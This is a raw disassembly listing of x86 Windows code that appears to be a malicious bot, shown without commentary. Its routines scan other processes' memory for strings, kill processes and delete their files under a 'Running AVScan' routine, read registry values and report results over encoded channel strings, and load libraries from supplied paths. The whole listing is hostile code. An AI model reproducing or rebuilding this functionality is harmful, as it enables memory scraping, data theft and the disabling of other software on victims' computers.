push [ebp+arg_0]
mov edi, dword_42F04C
push esi
call edi ; dword_42F04C
lea eax, [ebp+var_18]
push eax
push esi
call sub_423270
push esi
call sub_41750C
add esp, 0Ch
test eax, eax
jnz short loc_4171E4
push [ebp+arg_0]
push esi
call edi ; dword_42F04C
lea eax, [ebp+var_28]
push eax
push esi
call sub_423270
push esi
call sub_41750C
add esp, 0Ch
test eax, eax
jz loc_417407
mov [ebp+var_4], 2
loc_4171E4: ; CODE XREF: sub_417149+71�j
mov esi, 2800h
lea eax, [ebp+var_2928]
push esi
push eax
call sub_417539
pop ecx
test eax, eax
pop ecx
jz loc_417407
cmp [ebp+var_4], ebx
jnz short loc_417220
lea eax, [ebp+var_2928]
push offset off_43EC8C
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_417407
loc_417220: ; CODE XREF: sub_417149+BA�j
cmp [ebp+var_4], 2
jnz short loc_41725D
lea eax, [ebp+var_2928]
push offset dword_43EC88
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_417407
jmp short loc_41725D
; ---------------------------------------------------------------------------
loc_417243: ; CODE XREF: sub_417149+125�j
lea eax, [ebp+var_2928]
push eax
call sub_422120
test eax, eax
pop ecx
jz short loc_41725D
cmp [ebp+var_2928], 2Eh
jz short loc_417270
loc_41725D: ; CODE XREF: sub_417149+DB�j
; sub_417149+F8�j ...
lea eax, [ebp+var_2928]
push esi
push eax
call sub_417539
pop ecx
test eax, eax
pop ecx
jnz short loc_417243
loc_417270: ; CODE XREF: sub_417149+112�j
lea eax, [ebp+var_2928]
push esi
push eax
call sub_417539
pop ecx
test eax, eax
pop ecx
jz loc_417407
mov ebx, offset aIazcn0rzRw0xfk ; "iaZcN0Rz/rw0xfK1r.VuQwI."
mov edi, offset aSS_0 ; "%s %s"
loc_417291: ; CODE XREF: sub_417149+2B8�j
lea eax, [ebp+var_2928]
push eax
lea eax, [ebp+var_128]
push offset dword_43EC68
push eax
call sub_422063
and [ebp+arg_0], 0
lea eax, [ebp+var_2928]
push esi
push eax
call sub_417539
add esp, 14h
jmp loc_4173E8
; ---------------------------------------------------------------------------
loc_4172C2: ; CODE XREF: sub_417149+2A1�j
cmp [ebp+var_2928], 2Eh
jz loc_4173F0
cmp [ebp+var_4], 2
jnz short loc_4172F9
cmp [ebp+arg_0], 2
jnz short loc_4172F9
lea eax, [ebp+var_2928]
push eax
lea eax, [ebp+var_128]
push eax
call sub_423270
and [ebp+arg_0], 0
pop ecx
pop ecx
jmp loc_4173D9
; ---------------------------------------------------------------------------
loc_4172F9: ; CODE XREF: sub_417149+18A�j
; sub_417149+190�j
cmp [ebp+var_2928], 2Ah
jnz short loc_41731D
lea eax, [ebp+var_128]
push offset dword_43EC58
push eax
call sub_422063
pop ecx
lea eax, [ebp+var_2927]
pop ecx
jmp short loc_417323
; ---------------------------------------------------------------------------
loc_41731D: ; CODE XREF: sub_417149+1B7�j
lea eax, [ebp+var_2928]
loc_417323: ; CODE XREF: sub_417149+1D2�j
push eax
lea eax, [ebp+var_5128]
push eax
call dword_42F04C ; lstrcpyA
lea eax, [ebp+var_2928]
push esi
push eax
call sub_417539
pop ecx
test eax, eax
pop ecx
jz loc_4173F0
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2928]
push eax
call sub_4175CF
pop ecx
cmp eax, 1
pop ecx
jnz loc_417407
lea eax, [ebp+var_5128]
push eax
lea eax, [ebp+var_128]
push eax
call sub_423270
lea eax, [ebp+var_128]
push offset asc_43EC54 ; ": "
push eax
call sub_423270
push [ebp+var_8]
lea eax, [ebp+var_128]
push eax
call sub_423270
add esp, 18h
lea eax, [ebp+var_128]
cmp [ebp+arg_C], 0
push eax
push ebx
push edi
push [ebp+arg_10]
push [ebp+arg_4]
push [ebp+arg_8]
jnz short loc_4173B8
call sub_4105DF
jmp short loc_4173BD
; ---------------------------------------------------------------------------
loc_4173B8: ; CODE XREF: sub_417149+266�j
call sub_41066C
loc_4173BD: ; CODE XREF: sub_417149+26D�j
and [ebp+var_128], 0
add esp, 18h
push 1F4h
call dword_42F15C ; Sleep
and [ebp+var_8], 0
inc [ebp+arg_0]
loc_4173D9: ; CODE XREF: sub_417149+1AB�j
lea eax, [ebp+var_2928]
push esi
push eax
call sub_417539
pop ecx
pop ecx
loc_4173E8: ; CODE XREF: sub_417149+174�j
test eax, eax
jnz loc_4172C2
loc_4173F0: ; CODE XREF: sub_417149+180�j
; sub_417149+1F9�j
lea eax, [ebp+var_2928]
push esi
push eax
call sub_417539
pop ecx
test eax, eax
pop ecx
jnz loc_417291
loc_417407: ; CODE XREF: sub_417149+4A�j
; sub_417149+8E�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_417149 endp
; =============== S U B R O U T I N E =======================================
sub_41740C proc near ; CODE XREF: sub_416B4C+A5�p
; sub_416F48:loc_4170C9�p ...
cmp dword_45C1D4, 0
jz short loc_417420
mov eax, dword_455F24
test eax, eax
jz short loc_417420
call eax ; dword_455F24
loc_417420: ; CODE XREF: sub_41740C+7�j
; sub_41740C+10�j
mov eax, dword_45C1D8
push esi
mov esi, dword_42F0BC
test eax, eax
jz short loc_417433
push eax
call esi ; dword_42F0BC
loc_417433: ; CODE XREF: sub_41740C+22�j
mov eax, dword_45C1DC
test eax, eax
jz short loc_41743F
push eax
call esi ; dword_42F0BC
loc_41743F: ; CODE XREF: sub_41740C+2E�j
pop esi
retn
sub_41740C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417441 proc near ; CODE XREF: sub_416F48+2A�p
; sub_416F48+37�p ...
var_1000 = byte ptr -1000h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4220C0
mov al, byte_44D6A4
push edi
mov [ebp+var_1000], al
mov ecx, 3FFh
xor eax, eax
lea edi, [ebp+var_FFF]
rep stosd
cmp [ebp+arg_0], 0
stosw
stosb
pop edi
jnz short loc_417477
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_417477: ; CODE XREF: sub_417441+30�j
push [ebp+arg_0]
lea eax, [ebp+var_1000]
push eax
call dword_42F04C ; lstrcpyA
lea eax, [ebp+var_1000]
push offset asc_4381B4 ; "/"
push eax
call sub_423270
push [ebp+arg_4]
lea eax, [ebp+var_1000]
push eax
call sub_423270
add esp, 10h
lea eax, [ebp+var_1000]
push eax
call dword_42F138 ; LoadLibraryA
mov dword_45C1E0, eax
leave
retn
sub_417441 endp
; =============== S U B R O U T I N E =======================================
sub_4174BE proc near ; CODE XREF: sub_4170D5+5A�p
arg_0 = dword ptr 4
push edi
call dword_455F2C
mov edi, eax
test edi, edi
jnz short loc_4174CD
pop edi
retn
; ---------------------------------------------------------------------------
loc_4174CD: ; CODE XREF: sub_4174BE+B�j
push esi
mov esi, [esp+8+arg_0]
cmp byte ptr [esi], 0
jz short loc_4174EE
push offset byte_44D6A4
push edi
call dword_455EC4
pop ecx
test eax, eax
pop ecx
jnz short loc_4174EE
xor esi, esi
inc esi
jmp short loc_4174FF
; ---------------------------------------------------------------------------
loc_4174EE: ; CODE XREF: sub_4174BE+17�j
; sub_4174BE+29�j
push esi
push edi
call dword_455EC4
mov esi, eax
pop ecx
neg esi
sbb esi, esi
pop ecx
inc esi
loc_4174FF: ; CODE XREF: sub_4174BE+2E�j
push edi
call dword_455EC8
pop ecx
mov eax, esi
pop esi
pop edi
retn
sub_4174BE endp
; =============== S U B R O U T I N E =======================================
sub_41750C proc near ; CODE XREF: sub_417149+67�p
; sub_417149+84�p
arg_0 = dword ptr 4
and dword_45C1E8, 0
and dword_45C1E4, 0
push offset word_433F2C
push [esp+4+arg_0]
call sub_422F66
pop ecx
mov dword_45C1EC, eax
pop ecx
xor ecx, ecx
test eax, eax
setnz cl
mov eax, ecx
retn
sub_41750C endp
; =============== S U B R O U T I N E =======================================
sub_417539 proc near ; CODE XREF: sub_417149+A8�p
; sub_417149+11C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
and byte ptr [edi], 0
loc_417544: ; CODE XREF: sub_417539+1F�j
; sub_417539+25�j ...
call sub_417583
movsx eax, al
test eax, eax
jz short loc_41757F
cmp eax, 0Ah
jz short loc_417575
cmp eax, 0Dh
jz short loc_417544
xor ecx, ecx
loc_41755C: ; CODE XREF: sub_417539+38�j
test al, al
jz short loc_417544
cmp esi, [esp+8+arg_4]
jge short loc_41757F
mov [esi+edi], al
inc esi
shr eax, 8
inc ecx
cmp ecx, 4
jl short loc_41755C
jmp short loc_417544
; ---------------------------------------------------------------------------
loc_417575: ; CODE XREF: sub_417539+1A�j
and byte ptr [esi+edi], 0
xor eax, eax
inc eax
loc_41757C: ; CODE XREF: sub_417539+48�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41757F: ; CODE XREF: sub_417539+15�j
; sub_417539+2B�j
xor eax, eax
jmp short loc_41757C
sub_417539 endp
; =============== S U B R O U T I N E =======================================
sub_417583 proc near ; CODE XREF: sub_417539:loc_417544�p
mov eax, dword_45C1E8
cmp eax, dword_45C1E4
jl short loc_4175BD
push dword_45C1EC
and dword_45C1E8, 0
push 2800h
push 1
push offset byte_455F30
call sub_422BE2
add esp, 10h
mov dword_45C1E4, eax
test eax, eax
jg short loc_4175BD
xor al, al
retn
; ---------------------------------------------------------------------------
loc_4175BD: ; CODE XREF: sub_417583+B�j
; sub_417583+35�j
mov eax, dword_45C1E8
inc dword_45C1E8
mov al, byte_455F30[eax]
retn
sub_417583 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4175CF proc near ; CODE XREF: sub_417149+20A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
push edi
mov [ebp+var_10], ebx
mov al, [esi]
mov [ebp+var_4], ebx
cmp al, bl
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
jnz short loc_417606
loc_4175EF: ; CODE XREF: sub_4175CF+BF�j
push 1
call sub_422F79
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [eax], bl
loc_4175FE: ; CODE XREF: sub_4175CF+A3�j
xor eax, eax
inc eax
jmp loc_4176AC
; ---------------------------------------------------------------------------
loc_417606: ; CODE XREF: sub_4175CF+1E�j
cmp al, byte_43ECB0
jz short loc_417678
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
push esi
call sub_4176B1
add esp, 0Ch
test eax, eax
jz short loc_417674
cmp [ebp+var_8], ebx
jz short loc_417674
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_8]
call sub_417704
add esp, 10h
test eax, eax
jz short loc_417674
cmp [ebp+var_C], ebx
jz short loc_417674
mov eax, [ebp+var_4]
inc eax
push eax
call sub_422F79
mov esi, [ebp+arg_4]
cmp eax, ebx
pop ecx
mov [esi], eax
jz short loc_417674
push [ebp+var_4]
push [ebp+var_C]
push eax
call sub_4223F0
mov eax, [esi]
mov ecx, [ebp+var_4]
add esp, 0Ch
mov [ecx+eax], bl
jmp short loc_4175FE
; ---------------------------------------------------------------------------
loc_417674: ; CODE XREF: sub_4175CF+52�j
; sub_4175CF+57�j ...
xor eax, eax
jmp short loc_4176AC
; ---------------------------------------------------------------------------
loc_417678: ; CODE XREF: sub_4175CF+3D�j
push offset byte_43ECB0
call sub_422120
push esi
mov edi, eax
call sub_422120
pop ecx
cmp eax, edi
pop ecx
jz loc_4175EF
lea eax, [ebp+var_10]
add edi, esi
push eax
push [ebp+arg_4]
push edi
call sub_4176B1
add esp, 0Ch
neg eax
sbb eax, eax
neg eax
loc_4176AC: ; CODE XREF: sub_4175CF+32�j
; sub_4175CF+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_4175CF endp
; =============== S U B R O U T I N E =======================================
sub_4176B1 proc near ; CODE XREF: sub_4175CF+48�p
; sub_4175CF+CF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
mov edi, [esp+0Ch+arg_0]
push edi
call sub_422120
mov esi, eax
xor ebx, ebx
pop ecx
cmp byte ptr [esi+edi-1], 3Dh
jnz short loc_4176D5
inc ebx
cmp byte ptr [esi+edi-2], 3Dh
jnz short loc_4176D5
push 2
pop ebx
loc_4176D5: ; CODE XREF: sub_4176B1+17�j
; sub_4176B1+1F�j
push 0
push esi
push edi
call dword_455EBC
mov ecx, [esp+18h+arg_4]
add esp, 0Ch
test eax, eax
mov [ecx], eax
jz short loc_417700
lea eax, [esi+esi*2]
push 4
cdq
pop ecx
idiv ecx
mov ecx, [esp+0Ch+arg_8]
sub eax, ebx
mov [ecx], eax
xor eax, eax
inc eax
loc_417700: ; CODE XREF: sub_4176B1+39�j
pop edi
pop esi
pop ebx
retn
sub_4176B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417704 proc near ; CODE XREF: sub_4175CF+67�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
push esi
call dword_455F2C
mov esi, eax
test esi, esi
jz short loc_417754
push 0
push 1
push esi
call dword_455F28
add esp, 0Ch
test eax, eax
jnz short loc_417754
mov eax, [ebp+arg_0]
and [ebp+var_8], 0
mov [ebp+var_14], eax
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_18]
push eax
call dword_455ED0
add esp, 0Ch
test eax, eax
jz short loc_417758
loc_417754: ; CODE XREF: sub_417704+11�j
; sub_417704+23�j
xor eax, eax
jmp short loc_417773
; ---------------------------------------------------------------------------
loc_417758: ; CODE XREF: sub_417704+4E�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_8]
push esi
mov [eax], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_4]
mov [eax], ecx
call dword_455EC8
xor eax, eax
pop ecx
inc eax
loc_417773: ; CODE XREF: sub_417704+52�j
pop esi
leave
retn
sub_417704 endp
; =============== S U B R O U T I N E =======================================
sub_417776 proc near ; CODE XREF: sub_416C0B+E8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_422120
xor edx, edx
pop ecx
test eax, eax
jle short loc_4177A0
loc_417788: ; CODE XREF: sub_417776+28�j
mov cl, [edx+esi]
cmp cl, 41h
jl short loc_41779B
cmp cl, 5Ah
jg short loc_41779B
add cl, 20h
mov [edx+esi], cl
loc_41779B: ; CODE XREF: sub_417776+18�j
; sub_417776+1D�j
inc edx
cmp edx, eax
jl short loc_417788
loc_4177A0: ; CODE XREF: sub_417776+10�j
pop esi
retn
sub_417776 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4177A2 proc near ; CODE XREF: sub_403B2C+1045�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 88h
lea eax, [ebp+var_4]
and [ebp+var_4], 0
push eax
push 20019h
push 0
mov [ebp+var_8], 80h
push [ebp+arg_C]
push [ebp+arg_8]
call dword_42F008 ; RegOpenKeyExA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_88]
push eax
push 0
push 0
push [ebp+arg_10]
push [ebp+var_4]
call dword_42F000 ; RegQueryValueExA
test eax, eax
jnz short locret_417814
lea eax, [ebp+var_88]
push eax
push offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
push offset aSS_ ; "%s %s."
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 14h
push [ebp+var_4]
call dword_42F004 ; RegCloseKey
locret_417814: ; CODE XREF: sub_4177A2+48�j
leave
retn
sub_4177A2 endp
; ---------------------------------------------------------------------------
loc_417816: ; CODE XREF: .text:0042EF03�j
; .text:0042EF0B�j ...
mov eax, [ecx]
test eax, eax
jz short locret_417822
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
locret_417822: ; CODE XREF: .text:0041781A�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417823 proc near ; CODE XREF: sub_417A90+1CE�p
; sub_417A90+200�p
var_5504 = byte ptr -5504h
var_5503 = byte ptr -5503h
var_504 = byte ptr -504h
var_503 = byte ptr -503h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_3C = byte ptr 44h
push ebp
mov ebp, esp
mov eax, 5504h
call sub_4220C0
and [ebp+var_5504], 0
push ebx
push esi
push edi
mov ecx, 13FFh
xor eax, eax
lea edi, [ebp+var_5503]
and [ebp+var_504], 0
rep stosd
stosw
stosb
mov ecx, 13Fh
xor eax, eax
lea edi, [ebp+var_503]
push [ebp+arg_20]
rep stosd
stosw
stosb
xor edi, edi
push edi
push 1F0FFFh
call dword_42F0E4 ; OpenProcess
mov [ebp+var_4], eax
mov eax, [ebp+arg_10]
mov [ebp+arg_10], eax
jmp loc_417972
; ---------------------------------------------------------------------------
loc_417884: ; CODE XREF: sub_417823+152�j
push edi
lea eax, [ebp+var_504]
push 500h
push eax
push [ebp+arg_10]
push [ebp+var_4]
call dword_42F0E0 ; ReadProcessMemory
cmp eax, edi
jz loc_41797B
lea eax, [ebp+var_504]
push eax
lea eax, [ebp+var_5504]
push eax
call sub_423270
cmp off_43ECBC, edi
pop ecx
pop ecx
jz loc_417957
mov esi, offset off_43ECBC
mov ebx, esi
loc_4178CD: ; CODE XREF: sub_417823+12E�j
push dword ptr [esi]
lea eax, [ebp+var_5504]
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41794A
push dword ptr [ebx-4]
lea eax, [ebp+arg_3C]
push eax
push dword ptr [esi]
mov esi, offset dword_45C1F0
push offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
push offset aSFoundStringSI ; "%s Found string \"%s\" in \"%s\" File \"%s\"\n"...
push esi
call sub_422063
add esp, 18h
cmp [ebp+arg_4], edi
jnz short loc_417916
push esi
push [ebp+arg_C]
push [ebp+arg_0]
call sub_4104F6
add esp, 0Ch
loc_417916: ; CODE XREF: sub_417823+E2�j
push 7D0h
call dword_42F15C ; Sleep
sub esp, 128h
lea esi, [ebp+arg_18]
push 4Ah
pop ecx
mov edi, esp
push [ebp+arg_C]
rep movsd
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417989
add esp, 138h
xor edi, edi
loc_41794A: ; CODE XREF: sub_417823+BC�j
add ebx, 8
mov esi, ebx
cmp [ebx], edi
jnz loc_4178CD
loc_417957: ; CODE XREF: sub_417823+9D�j
push 5000h
lea eax, [ebp+var_5504]
push edi
push eax
call sub_4221F0
add esp, 0Ch
inc [ebp+arg_10]
mov eax, [ebp+arg_10]
loc_417972: ; CODE XREF: sub_417823+5C�j
cmp eax, [ebp+arg_14]
jbe loc_417884
loc_41797B: ; CODE XREF: sub_417823+7C�j
push [ebp+var_4]
call dword_42F038 ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_417823 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417989 proc near ; CODE XREF: sub_417823+11A�p
var_228 = dword ptr -228h
var_224 = byte ptr -224h
var_208 = byte ptr -208h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_34 = byte ptr 3Ch
push ebp
mov ebp, esp
sub esp, 228h
and [ebp+var_228], 0
push esi
push edi
mov ecx, 88h
push [ebp+arg_18]
xor eax, eax
lea edi, [ebp+var_224]
rep stosd
push 8
call sub_421C60 ; CreateToolhelp32Snapshot
mov edi, eax
lea eax, [ebp+var_228]
push eax
push edi
mov [ebp+var_228], 224h
call sub_421C5A ; Module32First
test eax, eax
jz loc_417A7E
mov esi, offset dword_45C1F0
loc_4179DA: ; CODE XREF: sub_417989+EF�j
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+arg_34]
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_417A69
lea eax, [ebp+var_108]
push 80h
push eax
call dword_42F08C ; SetFileAttributesA
push [ebp+arg_18]
push 0
push 1F0FFFh
call dword_42F0E4 ; OpenProcess
push 0
push eax
mov [ebp+var_4], eax
call dword_42F0EC ; TerminateProcess
push 1F4h
call dword_42F15C ; Sleep
lea eax, [ebp+var_108]
push eax
call dword_42F088 ; DeleteFileA
test eax, eax
jz short loc_417A69
lea eax, [ebp+var_108]
push eax
push offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
push offset aSTerminatedAnd ; "%s Terminated and deleted %s\n"
push esi
call sub_422063
add esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_417A69
push esi
push [ebp+arg_C]
push [ebp+arg_0]
call sub_4104F6
add esp, 0Ch
loc_417A69: ; CODE XREF: sub_417989+65�j
; sub_417989+AF�j ...
lea eax, [ebp+var_228]
push eax
push edi
call sub_421C54 ; Module32Next
test eax, eax
jnz loc_4179DA
loc_417A7E: ; CODE XREF: sub_417989+46�j
push [ebp+var_4]
mov esi, dword_42F038
call esi ; dword_42F038
push edi
call esi ; dword_42F038
pop edi
pop esi
leave
retn
sub_417989 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417A90 proc near ; DATA XREF: sub_403B2C+154B�o
var_1CC = dword ptr -1CCh
var_1A8 = byte ptr -1A8h
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 27h
mov esi, eax
pop ecx
lea edi, [ebp+var_A4]
rep movsd
mov esi, offset dword_45C328
mov dword ptr [eax+98h], 1
mov eax, [ebp+var_A4]
push 80h
push esi
push 0
mov [ebp+var_8], eax
call dword_42F074 ; GetModuleHandleA
push eax
call dword_42F154 ; GetModuleFileNameA
push 5Ch
push esi
call sub_4234F0
push offset byte_44D6A4
push offset asc_43E8EC ; "\\"
push eax
mov dword_45C3A8, eax
call sub_41F167
add esp, 14h
push 0
push 2
call sub_421C60 ; CreateToolhelp32Snapshot
lea ecx, [ebp+var_1CC]
mov [ebp+var_4], eax
push ecx
push eax
mov [ebp+var_1CC], 128h
mov byte ptr [ebp+arg_0+3], 1
call sub_421C6C ; Process32First
test eax, eax
jz loc_417CB8
mov ebx, dword_42F070
loc_417B2E: ; CODE XREF: sub_417A90+222�j
push dword_45C3A8
lea eax, [ebp+var_1A8]
push eax
call ebx ; dword_42F070
test eax, eax
jnz short loc_417B44
and byte ptr [ebp+arg_0+3], al
loc_417B44: ; CODE XREF: sub_417A90+AF�j
xor edi, edi
loc_417B46: ; CODE XREF: sub_417A90+EF�j
lea esi, off_43F000[edi]
lea eax, [ebp+var_1A8]
push dword ptr [esi]
push eax
call ebx ; dword_42F070
test eax, eax
jnz short loc_417B5E
and byte ptr [ebp+arg_0+3], al
loc_417B5E: ; CODE XREF: sub_417A90+C9�j
lea eax, [ebp+var_1A8]
push eax
push dword ptr [esi]
call sub_41F2BB
pop ecx
test eax, eax
pop ecx
jz short loc_417B76
and byte ptr [ebp+arg_0+3], 0
loc_417B76: ; CODE XREF: sub_417A90+E0�j
add edi, 4
cmp edi, 63Ch
jb short loc_417B46
xor edi, edi
loc_417B83: ; CODE XREF: sub_417A90+12C�j
lea esi, off_43F640[edi]
lea eax, [ebp+var_1A8]
push dword ptr [esi]
push eax
call ebx ; dword_42F070
test eax, eax
jnz short loc_417B9B
and byte ptr [ebp+arg_0+3], al
loc_417B9B: ; CODE XREF: sub_417A90+106�j
lea eax, [ebp+var_1A8]
push eax
push dword ptr [esi]
call sub_41F2BB
pop ecx
test eax, eax
pop ecx
jz short loc_417BB3
and byte ptr [ebp+arg_0+3], 0
loc_417BB3: ; CODE XREF: sub_417A90+11D�j
add edi, 4
cmp edi, 84h
jb short loc_417B83
xor edi, edi
loc_417BC0: ; CODE XREF: sub_417A90+169�j
lea esi, off_43F6C8[edi]
lea eax, [ebp+var_1A8]
push dword ptr [esi]
push eax
call ebx ; dword_42F070
test eax, eax
jnz short loc_417BD8
and byte ptr [ebp+arg_0+3], al
loc_417BD8: ; CODE XREF: sub_417A90+143�j
lea eax, [ebp+var_1A8]
push eax
push dword ptr [esi]
call sub_41F2BB
pop ecx
test eax, eax
pop ecx
jz short loc_417BF0
and byte ptr [ebp+arg_0+3], 0
loc_417BF0: ; CODE XREF: sub_417A90+15A�j
add edi, 4
cmp edi, 0A4h
jb short loc_417BC0
cmp byte ptr [ebp+arg_0+3], 0
jz loc_417C9D
cmp [ebp+var_10], 0
jz short loc_417C2E
lea eax, [ebp+var_1A8]
push eax
push offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
lea eax, [ebp+var_A0]
push offset aSRunningAvscan ; "%s Running AVScan on %s\n"
push eax
push [ebp+var_8]
call sub_4104F6
add esp, 14h
loc_417C2E: ; CODE XREF: sub_417A90+179�j
sub esp, 128h
lea eax, [ebp+var_A0]
lea esi, [ebp+var_1CC]
push 4Ah
pop ecx
mov edi, esp
push offset byte_4FFFFF
push 400000h
push eax
push [ebp+var_10]
rep movsd
push [ebp+var_18]
push [ebp+var_A4]
call sub_417823
add esp, 18h
lea eax, [ebp+var_A0]
lea esi, [ebp+var_1CC]
push 4Ah
pop ecx
mov edi, esp
push 1FFFFFh
push 100000h
push eax
push [ebp+var_10]
rep movsd
push [ebp+var_18]
push [ebp+var_A4]
call sub_417823
add esp, 140h
jmp short loc_417CA1
; ---------------------------------------------------------------------------
loc_417C9D: ; CODE XREF: sub_417A90+16F�j
mov byte ptr [ebp+arg_0+3], 1
loc_417CA1: ; CODE XREF: sub_417A90+20B�j
lea eax, [ebp+var_1CC]
push eax
push [ebp+var_4]
call sub_421C66 ; Process32Next
test eax, eax
jnz loc_417B2E
loc_417CB8: ; CODE XREF: sub_417A90+92�j
push [ebp+var_4]
call dword_42F038 ; CloseHandle
call sub_4245F8
push [ebp+var_20]
call sub_41C059
pop ecx
push 0
call dword_42F150 ; ExitThread
sub_417A90 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417CD7 proc near ; DATA XREF: sub_403B2C+1842�o
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_418 = byte ptr -418h
var_314 = byte ptr -314h
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_1E8 = dword ptr -1E8h
var_1E4 = dword ptr -1E4h
var_5C = dword ptr -5Ch
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 594h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 90h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
xor edi, edi
push [ebp+var_214]
inc edi
mov esi, [ebp+var_208]
mov [eax+0BCh], edi
mov eax, [ebp+var_29C]
mov [ebp+arg_0], eax
mov eax, [ebp+var_204]
mov [ebp+var_18], eax
lea eax, [ebp+var_418]
push eax
call dword_42F04C ; lstrcpyA
lea eax, [ebp+var_418]
push 104h
push eax
lea eax, [ebp+var_594]
push eax
call sub_4222F0
add esp, 0Ch
lea eax, [ebp+var_594]
push eax
call dword_45429C ; PathRemoveFileSpecA
xor ebx, ebx
test eax, eax
jnz short loc_417DB9
cmp [ebp+var_1E8], ebx
mov edi, dword_42F068
mov esi, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
jnz short loc_417D8D
cmp [ebp+var_1E4], ebx
jnz short loc_417D99
call edi ; dword_42F068
push eax
push esi
lea eax, [ebp+var_298]
push offset aSCouldnTPars_0 ; "%s Couldn't parse path,error: <%d>"
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 14h
loc_417D8D: ; CODE XREF: sub_417CD7+91�j
cmp [ebp+var_1E4], ebx
jz loc_417E79
loc_417D99: ; CODE XREF: sub_417CD7+99�j
call edi ; dword_42F068
push eax
push esi
lea eax, [ebp+var_298]
push offset aSCouldnTPars_0 ; "%s Couldn't parse path,error: <%d>"
push eax
push [ebp+arg_0]
call sub_410491
add esp, 14h
jmp loc_417E79
; ---------------------------------------------------------------------------
loc_417DB9: ; CODE XREF: sub_417CD7+7E�j
push 44h
lea eax, [ebp+var_5C]
push ebx
push eax
call sub_4221F0
push 10h
lea eax, [ebp+var_14]
push ebx
